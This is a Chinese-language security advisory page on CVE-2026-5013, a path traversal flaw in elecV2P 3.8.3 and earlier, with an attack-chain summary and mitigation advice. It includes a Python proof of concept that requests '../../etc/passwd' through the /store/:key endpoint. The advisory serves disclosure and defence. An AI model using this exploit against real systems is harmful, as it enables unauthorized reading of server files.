IPBUF安全漏洞报告
English
CVE-2026-5013 CVSS 5.3 中危

CVE-2026-5013 elecV2P路径遍历漏洞

披露日期: 2026-03-28

漏洞信息

漏洞编号
CVE-2026-5013
漏洞类型
路径遍历
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
elecV2P

相关标签

路径遍历elecV2P信息泄露CVE-2026-5013

漏洞概述

elecV2P 3.8.3及之前版本存在安全漏洞。在/store/:key接口中,由于未正确处理用户输入的URL参数,攻击者可利用path.join函数的特性实施路径遍历攻击。该漏洞无需认证即可远程触发,可能导致服务器敏感文件泄露。

技术细节

漏洞根源在于程序使用Node.js的path.join()函数处理/store/:key路由中的URL参数,但未对输入进行严格的路径规范化校验。攻击者可以通过构造包含../序列的恶意URL参数,绕过目录限制,访问服务器根目录及其子目录下的任意文件。由于CVSS向量显示为AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N,该攻击主要造成低机密性影响,即读取敏感信息,暂未直接影响系统完整性或可用性。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描目标网络,识别运行elecV2P且版本低于或等于3.8.3的服务。
STEP 2
2. 发送恶意请求
攻击者向/store/:key接口发送特制的HTTP请求,在URL参数中插入../序列。
STEP 3
3. 路径遍历
服务器端path.join函数拼接路径,导致../生效,跳出预设目录。
STEP 4
4. 获取敏感信息
服务器返回目标文件(如/etc/passwd或配置文件)的内容给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL with vulnerable endpoint target = "http://vulnerable-host:8000" # Payload to traverse to /etc/passwd # The endpoint is /store/:key, manipulating the key part payload = "../../etc/passwd" url = f"{target}/store/{payload}" try: response = requests.get(url, timeout=5) if response.status_code == 200 and "root:" in response.text: print("[+] Vulnerability confirmed! /etc/passwd content leaked.") print(response.text) else: print("[-] Exploit failed or target not vulnerable.") except Exception as e: print(f"[!] Error: {e}")

影响范围

elecV2P <= 3.8.3

防御指南

临时缓解措施
建议立即升级软件。如无法升级,应在反向代理或WAF层拦截包含../、%2e%2e等路径遍历字符的请求,并限制Web应用对系统关键文件的读取权限。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表